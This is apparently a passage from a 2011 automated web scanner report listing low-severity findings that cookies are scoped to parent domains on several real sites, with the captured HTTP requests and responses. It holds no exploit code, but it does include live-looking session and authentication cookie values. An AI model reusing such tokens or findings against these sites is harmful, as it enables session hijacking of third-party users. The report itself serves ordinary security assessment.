
Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pix.aspx?atok=zx2-2183-it&eventtype=3&aid=200&mode=html&ver=2.5&ref=&r=0.9961211793124676 HTTP/1.1
Host: rainbow.mythings.com
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Date: Mon, 02 May 2011 22:16:02 GMT
Expires: -1
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Microsoft-IIS/6.0
Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/
Set-Cookie: mt_zx2-2183-it=02|QwAAAB+LCAAAAAAABADsvQdgHEmWJSYvbcp7f0r1StfgdKEIgGATJNiQQBDswYjN5pLsHWlHIymrKoHKZVZlXWYWQMztnbz33nvvvffee++997o7nU4n99//P1xmZAFs9s5K2smeIYCqyB8/fnwfPyJ+cXZ+/uh73x8tsuLRR3s7Ox+NmotH3/vFefvo3sh+1DaPPtrd3bm/s7e3t/vpzt5Ho+mj3VEzpxd/yfd/yf8TAAD//5lh16VDAAAA; domain=.mythings.com; expires=Fri, 01-Jul-2011 22:16:02 GMT; path=/
Set-Cookie: cksession=424bced9-3349-491e-b41d-abd485764b45; domain=.mythings.com; path=/
Set-Cookie: ckid=e983b326-a4f8-4e01-aae3-4bac13918ccc; domain=.mythings.com; expires=Sun, 02-May-2021 22:16:02 GMT; path=/
Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/
Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/
Set-Cookie: mttgt={ts:"110502221602",cmp:[]}; domain=.mythings.com; expires=Fri, 01-Jul-2011 22:16:02 GMT; path=/
Set-Cookie: uip=173U193U214U243; domain=.mythings.com; path=/
X-AspNet-Version: 4.0.30319
x-machine-name: Rainbow-28 (i-00667d77)
X-Powered-By: ASP.NET
Content-Length: 3147
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title></title>

<script type="text/javascr
...[SNIP]...

14.2. http://www.capterra.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.capterra.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.capterra.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 02 May 2011 21:29:22 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: _capterra2_session=75f949d578551313ca6b29b53fc5e0fb; domain=.capterra.com; path=/
Status: 200 OK
ETag: "d4dd6081c7ecf86b42335bf1f4e6746d"
X-Runtime: 2ms
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 22685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

14.3. http://www.capterra.com/business-management-and-analytics-software  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.capterra.com
Path:   /business-management-and-analytics-software

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business-management-and-analytics-software HTTP/1.1
Host: www.capterra.com
Proxy-Connection: keep-alive
Referer: http://www.capterra.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _capterra2_session=a021ea8f054eadaddff1d26a2cd5c566; __utmz=212671878.1304389766.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=212671878.1729683407.1304389766.1304389766.1304389766.1; __utmc=212671878; __utmb=212671878.1.10.1304389766

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 02 May 2011 21:30:21 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: _capterra2_session=a021ea8f054eadaddff1d26a2cd5c566; domain=.capterra.com; path=/
Status: 200 OK
ETag: "8a3d275b53eeffcb296a4cfa5aae81c1"
X-Runtime: 13ms
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 8441

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

14.4. http://www.capterra.com/business-process-management-software  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.capterra.com
Path:   /business-process-management-software

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business-process-management-software HTTP/1.1
Host: www.capterra.com
Proxy-Connection: keep-alive
Referer: http://www.capterra.com/business-management-and-analytics-software
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=212671878.1304389766.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _capterra2_session=a021ea8f054eadaddff1d26a2cd5c566; __utma=212671878.1729683407.1304389766.1304389766.1304389766.1; __utmc=212671878

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 02 May 2011 23:57:32 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: _capterra2_session=a021ea8f054eadaddff1d26a2cd5c566; domain=.capterra.com; path=/
Status: 200 OK
ETag: "3e7fe3ed26f6467dbf4a37a525a340bd"
X-Runtime: 236ms
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 234279

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

14.5. http://www.house24.ilsole24ore.com/external/showCase/library-luxury24~2.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.house24.ilsole24ore.com
Path:   /external/showCase/library-luxury24~2.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /external/showCase/library-luxury24~2.js HTTP/1.1
Host: www.house24.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.luxury24.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304392432179; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cm_NW=undefinedburpburp; SC_LINKS_NW=%5B%5BB%5D%5D; c=undefinedwww.banchedati.ilsole24ore.comwww.banchedati.ilsole24ore.com; s_cc=true; s_nr=1304393553709-New; SC_LINKS_SH=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:32:49 GMT
Server: Apache/2.2.11 (Debian) PHP/5.2.9-3eks with Suhosin-Patch
X-Powered-By: PHP/5.2.9-3eks
Set-Cookie: H24SESSID=ed2eeb4e11d807c61f2aca7698b279f0; path=/; domain=.house24.ilsole24ore.com
Expires: Mon, 09 May 2011 22:32:49 GMT
Cache-Control: public, max-age=604800
Pragma: no-cache
Last-Modified: Tue, 12 Apr 2011 08:24:23 GMT
Etag: "96111dfa08b9f205112dfd02a54280a7"
Vary: Accept-Encoding
Content-Type: application/x-javascript
Content-Length: 93812

//<![CDATA[
// Including compressedLegacy.js
(function(){var p=null;if((p||typeof djConfig!="undefined"&&djConfig.scopeMap)&&typeof window!="undefined"){var y="",I="",E="",F={},L={};p=p||djConfig.scop
...[SNIP]...

14.6. http://www.house24.ilsole24ore.com/vimages/default/logos/house24extCarouselBanner.png  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.house24.ilsole24ore.com
Path:   /vimages/default/logos/house24extCarouselBanner.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /vimages/default/logos/house24extCarouselBanner.png HTTP/1.1
Host: www.house24.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.luxury24.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304392432179; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cm_NW=undefinedburpburp; SC_LINKS_NW=%5B%5BB%5D%5D; c=undefinedwww.banchedati.ilsole24ore.comwww.banchedati.ilsole24ore.com; s_cc=true; s_nr=1304393553709-New; SC_LINKS_SH=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:32:49 GMT
Server: Apache/2.2.11 (Debian) PHP/5.2.9-3eks with Suhosin-Patch
X-Powered-By: PHP/5.2.9-3eks
Set-Cookie: H24SESSID=0c09dfd5003f480e5b42c4baca3d49ba; path=/; domain=.house24.ilsole24ore.com
Expires: Mon, 02 May 2011 23:32:49 GMT
Cache-Control: private, max-age=3600
Pragma: no-cache
Content-Length: 1864
Last-Modified: Tue, 12 Apr 2011 08:24:23 GMT
Etag: "9befdc06f66f8b037b32248b9a063423"
Content-Type: image/png

.PNG
.
...IHDR...h.........R......    pHYs.................tIME.......^.-j....IDATX..YoL.].? 7a6nc.,....lf.......Z.+.52..Y..X....IA..k..:j....C.)V..o`M.-....".`e..=....nn....~....\.u.s..;...R.....|P.
...[SNIP]...

14.7. http://www.sciencedirect.com/science/journal/09574174  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sciencedirect.com
Path:   /science/journal/09574174

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /science/journal/09574174 HTTP/1.1
Host: www.sciencedirect.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 21:30:11 GMT
Last-Modified: Mon, 02 May 2011 21:30:11 GMT
Set-Cookie: EUID=5c90559a-7503-11e0-a9ef-00008a0c593e; expires=Sunday, 27 Apr 2031 21:30:11 GMT; path=/; domain=.sciencedirect.com; HttpOnly;
Set-Cookie: MIAMISESSION=5c8fd124-7503-11e0-a9ef-00008a0c593e:3481824611; path=/; domain=.sciencedirect.com; HttpOnly;
Set-Cookie: TARGET_URL=fcf74dd786744d87fbaaaf8652a764ab4a79b0d3ed681139e910692376063105b57efc9f763ef87b0f182b22962ff5424f96d9e5b6030b75; path=/; domain=.sciencedirect.com; HttpOnly;
Set-Cookie: MIAMIAUTH=eb9092b9359d796deaaa50f404edb475f8f314ccbfd08dcf0e1e523e31854f5f604fbffdf4977365769b852ffa16d2dea7b9db8616c1b39d8dd60cd15475b6f0b3ee334e505c6e4e55e130a20ef5c10ba3c9876e4263f1ad055fab611d82cc7426ac7fde03dd09460d1b08b658457a33b18b752c5d43253a487a091cbb6d637610d1e7106a65fcf10b75f36b7811b36cb75cb6a0341d9c0235ae752182e7f8b412372d4115c9b7d30b27d80dbd6ee795f15a38ce4922bdc2f06d88e8c622e396dad16444a66e001e2b5db1798fc4c70bc3ea373e5818ca0699e2768df0eb0236b0c50b65f461cfed1cec6cd529701c55becdd3c14767f97b9f8f4b34762d3945; path=/; domain=.sciencedirect.com; HttpOnly;
Set-Cookie: MIAMIAUTH=eb9092b9359d796deaaa50f404edb475f8f314ccbfd08dcf0e1e523e31854f5f604fbffdf4977365769b852ffa16d2dea7b9db8616c1b39d8dd60cd15475b6f0b3ee334e505c6e4e55e130a20ef5c10ba3c9876e4263f1ad055fab611d82cc7426ac7fde03dd09460d1b08b658457a33b18b752c5d43253a487a091cbb6d637610d1e7106a65fcf10b75f36b7811b36cb75cb6a0341d9c0235ae752182e7f8b412372d4115c9b7d30b27d80dbd6ee795f15a38ce4922bdc2f06d88e8c622e396dad16444a66e001e2b5db1798fc4c70b1c496669dc41dbcaa56c4d113b5e25a946db4b7eade4d41795906e7b40cd0395bf9f4873f3a55ae8415846900b9cada8; path=/; domain=.sciencedirect.com; HttpOnly;
Content-Type: text/html
Expires: Tue, 01 Jan 1980 04:00:00 GMT
X-RE-Ref: 0 -1162923096
Server: www.sciencedirect.com 9999 138.12.6.53:80
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "_http://www.w3.org/TR/html4/loose.dtd" >
<html>
<head>


<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- TRAN
...[SNIP]...

14.8. https://www.sciencedirect.com/science  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.sciencedirect.com
Path:   /science

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /science?_ob=RegistrationURL&_method=display&_type=guest&_returnURL=http%3A%2F%2Fwww.sciencedirect.com%2Fscience%3F&_acct=C000050221&_version=1&_userid=10&md5=45e26359c93486a3badd56805f2eba73 HTTP/1.1
Host: www.sciencedirect.com
Connection: keep-alive
Referer: http://www.sciencedirect.com/science/journal/09574174
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EUID=4d15f4a8-7503-11e0-b300-00008a0c593d; MIAMISESSION=4d1567b8-7503-11e0-b300-00008a0c593d:3481824585; TARGET_URL=fcf74dd786744d87fbaaaf8652a764ab4a79b0d3ed681139e910692376063105b57efc9f763ef87b0f182b22962ff5424f96d9e5b6030b75; MIAMIAUTH=bf9bbfabc36a2d8c825558b831604b4d4ffcfbcf2a8d24615e09f2745b18af5a588c89bd9b9941c39dbf615f11954aac68ce91676c8b29af63c56d31d7055e130fb5e584b31984172d460b01785dd047312cc074ae0116baca1dad3ee7f334b15b598374f63143b8f5c3fb7e01b0c1b09c83977b5356ea63fde46ceb62456da6bd75a7fff3865929cba2e570ae113571af8dcff9f016b32ec08190e7f1a7bc6ae75511dac9a7329f9538ea44d9cba9d7a7dbe99055b96ad6e546454ffd28f7b3c36c5dda2c21ca2eddd7556e70451177e524b0f2a1cd5274abfa41d14fffd5999a5d42d95aa0919aedfde06b9fb8e6b7a38754814890011d98888a985f778857; BROWSER_SUPPORTS_COOKIES=1

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 21:30:41 GMT
Last-Modified: Mon, 02 May 2011 21:30:41 GMT
Set-Cookie: MIAMISESSION=4d1567b8-7503-11e0-b300-00008a0c593d:3481824641; path=/; domain=.sciencedirect.com; HttpOnly;
Content-Type: text/html
Expires: Tue, 01 Jan 1980 04:00:00 GMT
X-RE-Ref: 0 -1136083128
Server: www.sciencedirect.com 9999 138.12.6.33:443
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "_http://www.w3.org/TR/html4/loose.dtd" >
<html>
<head>


<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- TRA
...[SNIP]...

14.9. http://www.yoox.com/scripts/services/dynamicsGalleryService.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.yoox.com
Path:   /scripts/services/dynamicsGalleryService.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /scripts/services/dynamicsGalleryService.asp?idCollection=3615&nax=2 HTTP/1.1
Host: www.yoox.com
Proxy-Connection: keep-alive
Referer: http://www.yoox.com/_partners/luxury24/slide_luxury_moda_210x195.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; Charset=UTF-8
Expires: Tue, 09 Oct 1990 22:00:00 GMT
Server: Microsoft-IIS/7.5
CT: 5/3/2011 12:49:47 AM
X-Powered-By: ASP.NET
ORIGIN: Web18
Vary: Accept-Encoding
Date: Mon, 02 May 2011 22:45:43 GMT
Connection: close
Set-Cookie: SESSIONTRACKING=isfirst=1&session=44859fce%2D86d5%2D4c64%2Db601%2Dd31b5e7ff802; domain=yoox.com; path=/
Set-Cookie: SESSIONS=FIRSTTIMEUSER=1; domain=yoox.com; path=/
Set-Cookie: REMEMBERCOUNTRY=REMEMBER=0; expires=Tue, 01-May-2012 22:00:00 GMT; domain=yoox.com; path=/
Set-Cookie: VISIT=WAREHOUSES=271%2C974&ANONYMOUS%5FCHECKOUT=true&EUR%5FEXCHANGE%5FRATE=1%2E00000&VALUTA%5FID=2&DYN%5FPATH=%2Fit%2F&SIGLA%5FVALUTA=EUR&ID%5FMERCATO%5FPER%5FLISTINO=2&REFERENCE%5FCURRENCYCODE=EUR&CURRENCYCODE=EUR&ID%5FMERCATO=2&NAZIONE%5FISO=IT&MERCATO%5FPATH=%2Fit%2F&CAMBIO%5FEURO=1%2E00000&NAZIONE=ITALY&TSKAY=6383154F&SITE%5FCODE=YOOX%5FIT&ID%5FNAZIONE=2; domain=yoox.com; path=/
Set-Cookie: HBXSESSION=NEWUSER=1; domain=yoox.com; path=/
Set-Cookie: OLDVISIT=1; expires=Tue, 01-May-2012 22:00:00 GMT; domain=yoox.com; path=/
Set-Cookie: USERINFO=SESSOBAMBINO=D&SESSO=D; expires=Tue, 01-May-2012 22:00:00 GMT; domain=yoox.com; path=/
Set-Cookie: ABTESTINGNEWUSER=1; domain=yoox.com; path=/
Content-Length: 1779

<?xml version="1.0"?>
<gallery>
<image code="39215905" tit="JUST CAVALLI" subtit="Cardigan" macro="Maglieria" prezzo="225" prezzoold="225" />
<image code="44300112" tit="PATRICIA ROSALES" subtit="S
...[SNIP]...

14.10. http://a.tribalfusion.com/h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=apnlbZaRkP6dPeCnw7cTj0ZaA4FZb2mq3iZc5QWFcgQ1qoaFjZb7yhwYou30slVghs777kSRP6F4n7i4tbkDBKA3flNWD7G4PrKidUMm4uHEhIZbgu7f5RJ6Sa852UJS62FpwTKLUBnfZakQh4lKZc5cvGAin5YrlLuZcrSoenpptWZd5Ws2WcQxH9qhdyub6dneP6MHPteqOCDDfTudRLe8sGVellGGcqPPgCmJZbdQ3cogm2Exrfum7vCU9QcUoVg0iUQ4mSg3bdbyrPVL9SSnqFyl9B85wGr1mSGE8vsQwu873SoOIxNk8Xj16bmj7cg4EZcjdFawnctijtTLoj9brK6A5SyywLwtng11wTxlj8VNZd4a1xCdgFoipLtKE5IjIGrbSBM5hOZdk3hP6nbX2cmrPx259CZcVUrQllJZc1S5MADWQhSgjmADaf4ERECORSWYoZbQZdOekqyZavT6lEatuVUZbxVoGHofFfhvYmYFthR6EEMHBdR57R6xADTxm9SHUXHNetUo5Xs035eWtbPu;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aunAVowl6hgUQQwjQPqZbZcHjZdfIq62TAjZcCURWZbQj64BVBak2OCREuvUWSwZcKol7QttS7yo5bJW5dBwBnVO2hCo4pvR5crckTqSXiBxIlZaEeZdJZc4qBcQDcdqbPlFiIgMQ8yS8F6Ciix1iN7X9OdI2BUyrD6rN2UyXYswtLEs8gdO2J67ZcStvTbxZbBZbuaajfmrb0ZajeZdM2kqTZabZdtEgZbqIa7grMMfWdyOrLc7uqkvmiwspb3VxKD3pVn3J3q8sa5s8SXVPbIIa5urRVBf918n7P7ubQaOCP9MU0yUhKO535Pem70hK0Wjf1fiIndq5Bf4kZdBaUM8do1By5kxoVYP3Zcd4rPOAPP8kPGFHU6AARscGSHxCWGtq84RnwSljRTdVXb6fjjGAW4o5HgRvbd4mHN1cOGWi3v0UJqCpFOZbZcZdVkhLsgyWAbjvofqr7sREPZaZbMdtETqPVvK5KpqvETosWasaSF45iN2YLOmvMZdV0h1kF8VLnWwrJpk4Onm0S7fHFS2fYZdPGZdYoqQuGVKj4a; path=/; domain=.tribalfusion.com; expires=Sun, 31-Jul-2011 22:21:27 GMT;
Content-Type: text/html
Location:
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

14.11. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=absoluteastronomycom&adSpace=ros&tagKey=3617734779&th=24028783270&tKey=undefined&size=160x600|120x600&p=9723396&a=1&flashVer=10&ver=1.20&center=1&noAd=1&addBlockingCategories=Adult|Sweepstakes|Suggestive|Flashing|Warning|Audio|Pop-under|Pop-up|Full-page|Expandable&url=http%3A%2F%2Fwww.absoluteastronomy.com%2Ftopics%2FExpert_system&f=0&rnd=9723461 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.absoluteastronomy.com/topics/Expert_system
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aTnjFkNj6WaoyhU0AIxZboTkkJ3wQTvcilRX8Sc1yIfAFrYa54XW6PoVa5IKhZcwl8wZbT6fo1s7TYbb6Za8dGyvZcqTAmZbTWrs7W7asxyd8yyLkOMgWW4OGcsZbnVexCZbag0a5EdDE5sRNZd4ZaxhntmqRn7Zd7sceZcv66cGIq2ESt2T3N1kvpZaqNddproTIkLhbajLZb9YcUodwJ0cZcOcCNQ7ciHtddN83xmnbZajysXnfAZaetjBIbj6CX2qZaZd3T00cXevqJtVxbBPn3Zd7XNanwGsqJbpAmem8QeWUGfJKv46uSTbRZbmcYeBj2hKIHlZaDQFGZdfMafZatpVZcHZdNJxXbHav9qA6LEhElatrp8mxo1PGtQyZaTkBAXDCZbMGFf76ZcORgGCMxHQxZds7Ebc3r6Dg6O0SsKJgeL48flnqOjnZasZbjWvStiyZbms3WnMZdBqAb5NZccKhW52DjKXntntQFw4OVpevnWtchZavWjLV5BTCMeZdwsnbsw4EKGS7AkZbFuwPF

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=aUnjbiON6J9RZbUxMbuUXVJf4ZbjtQXChZahBxclKSZcJokdY25lKK0rIe1TC6utBNMFXNeRfa7fFkat9Zc9ebmo6rZdyVQm7i6EbkagZcLAVcKX9EA3VvMfKPaM02brxQLxKvLgeR27gSo7hrlbMjfHyZdGknZdRaYxaTkZda7FSc0maduiRZa4VvppqBTVH4QFaCALluhvU2YBFXxHTGBe4ukpUvI01SGO2jrUF0HKSkO1tM5IDFn7J7qrunGMZb1Jm82qfn3wWDItfT3qQRDZdaq4pdmL4Zcxvi88b1YpW96rTQZaFp6Gq0rmUL0AkqXFL50Zd5fVGIl5xlYSmIjVqIUNqMwqdAwZbK5ZcU9kHeCPV8SA7HZaQT4fkxl5imDUkZdfj43wqHB3Za25YQdRkHMTZbgKChTZbjd7mCQDc0drAZaGwLPKOeNvTDrSBVT5Mb9I463payRlYuZdLyLFj6jYZcUXGav5P4sjNtqwP4wQdYy8DdDl3NnCZbsfHucXvgHMflZa3sc2; path=/; domain=.tribalfusion.com; expires=Sun, 31-Jul-2011 21:29:46 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 584

document.write('<!-- START DART (iframe) -->\n<IFRAME SRC=\'http://ad.doubleclick.net/adi/N3175.8427.TRIBALFUSIONADNETWORK/B4640114;sz=120x600;click=http://a.tribalfusion.com/h.click/aSmOnI4drZdPs7Zd5
...[SNIP]...

14.12. http://ad.doubleclick.net/adj/N3024.152171.WEBSYSTEM_ILSOLE24O/B5226098  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3024.152171.WEBSYSTEM_ILSOLE24O/B5226098

Issue detail

